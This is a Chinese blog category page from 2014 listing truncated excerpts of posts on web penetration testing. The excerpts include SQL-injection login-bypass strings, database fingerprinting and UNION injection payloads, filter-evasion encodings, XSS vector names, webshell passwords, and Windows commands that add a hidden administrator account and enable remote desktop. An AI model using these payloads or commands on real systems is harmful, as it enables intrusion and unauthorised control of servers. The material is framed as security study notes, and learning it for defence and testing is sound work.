随笔分类 - 网络安全/渗透经验/防护

关注网络安全,提高防范意识
摘要: 开始找工作了,先总结一点渗透的手段,面试的时候可能用的着,我始终坚信机会是留给有准备的人的,多一份努力,就多一份机遇。稍微写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。注意经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。欢迎来俺博客玩...阅读全文
posted @ 2014-11-09 17:13 小菜希 阅读(188) | 评论 (0) 编辑
摘要: 所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。分享给大家、、 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=...阅读全文
posted @ 2014-11-09 17:12 小菜希 阅读(142) | 评论 (0) 编辑
摘要: 最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们...阅读全文
posted @ 2014-11-09 17:10 小菜希 阅读(68) | 评论 (0) 编辑
摘要: 判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是accessMSSQL: and (select id from sysobjects) >0 返回正常说明是mssqlMySQL: and length(user()...阅读全文
posted @ 2014-11-09 17:09 小菜希 阅读(106) | 评论 (0) 编辑
摘要: 黑羽基地免杀asp大马 密码5201314 Asp站长助手6.0 密码584521 web综合安全评测 - Beta3 密码nohack 未知数X 密码45189946 baidu}" 密码baidu 路遥知马力 密码123 黑客网站之家 美化版 密码chenxue Thé、End.゛...阅读全文
posted @ 2014-11-09 17:08 小菜希 阅读(437) | 评论 (0) 编辑
摘要: 脚本一 找到注入点以后,先用明小子或者啊D扫后台,找到后台后再猜解用户名和MD5加密的密码,MD5解密可以到www.cmd5.com等网站去解密。 得到解密后的密码后,进后台,然后就是找有没有数据库备份,有数据库备份则上传图片格式的小马,然后数据库备份。如果没有数据库备份则抓包...阅读全文
posted @ 2014-11-09 17:04 小菜希 阅读(142) | 评论 (0) 编辑
摘要: 加账户net user seayace seay /add 建立账户,用户名seayace 密码seaynet localgroup Administrators seayace /add 提升到管理员权限开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\...阅读全文
posted @ 2014-11-09 17:02 小菜希 阅读(123) | 评论 (0) 编辑
摘要: net user SQLDebugger list /addnet localgroup administrators SQLDebugger /addError Message:未能找到存储过程 'master..xp_cmdshell'。修复法:很通用的,其实碰到 其他126 127的都可以一起...阅读全文
posted @ 2014-11-09 17:01 小菜希 阅读(97) | 评论 (0) 编辑
摘要: whois域名/ip查看域名的详细信息。ping域名/ip测试本机到远端主机是否联通。dig域名/ip查看域名解析的详细信息。host-l域名dns服务器传输zone。查询信息的网站:http://centralops.nethttp://www.dnsstuff.comhttp://servers...阅读全文
posted @ 2014-11-09 16:57 小菜希 阅读(1289) | 评论 (0) 编辑
摘要: QL注入大全 Crack8小组 整理1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0(select count(*) from *)and 0(select count(*) fro...阅读全文
posted @ 2014-11-09 16:56 小菜希 阅读(19387) | 评论 (0) 编辑
摘要: access注入 access偏移注入 access搜索型注入 access登陆框注入1.判断注入.and 1=1 and 1=2或者 -0 -1 看页面的变化2. access注入.联合查询order by 10and 1=2 union sele...阅读全文
posted @ 2014-11-09 16:49 小菜希 阅读(237) | 评论 (0) 编辑
摘要: 解析漏洞总结Author:laterainFrom:90sec------------------------------------------------------------------------IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e....阅读全文
posted @ 2014-11-09 16:48 小菜希 阅读(146) | 评论 (0) 编辑
摘要: (1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 ”> (7)formCharCode标签(计算器) (8)UTF-8...阅读全文
posted @ 2014-11-09 16:47 小菜希 阅读(76) | 评论 (0) 编辑
摘要: Mysql sqlinjection code# %23 -- /* /**/ 注释UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,...阅读全文
posted @ 2014-11-09 16:46 小菜希 阅读(4813) | 评论 (0) 编辑
摘要: 11种绕过防注入的办法1、运用编码技术绕过如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。2、通过空格绕过如两个空格代替一个空格,用Tab代替空格等,...阅读全文
posted @ 2014-11-09 16:45 小菜希 阅读(103) | 评论 (0) 编辑
摘要: PHP网页的安全性问题 针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(CommandInjection)2.eval注入(EvalInjection) 3.客户端脚本攻击(scriptInsertion) 4.跨网站脚本攻击(CrossSitescripting,XSS)5.SQ...阅读全文
posted @ 2014-11-09 16:44 小菜希 阅读(202) | 评论 (0) 编辑
摘要: 1.注入攻击And1=11=2OrderbyxxUnionselect1,2,列名,....From表名2.未验证的上传页面经典上传截取拿shell(修改当前页面的参数,达到伪造恶意攻击)经典上传抓包拿shell(抓数据包,利用工具去自动判断验证方式,修改并上传)3.万能密码与登陆框注入'or'='...阅读全文
posted @ 2014-11-09 16:43 小菜希 阅读(194) | 评论 (0) 编辑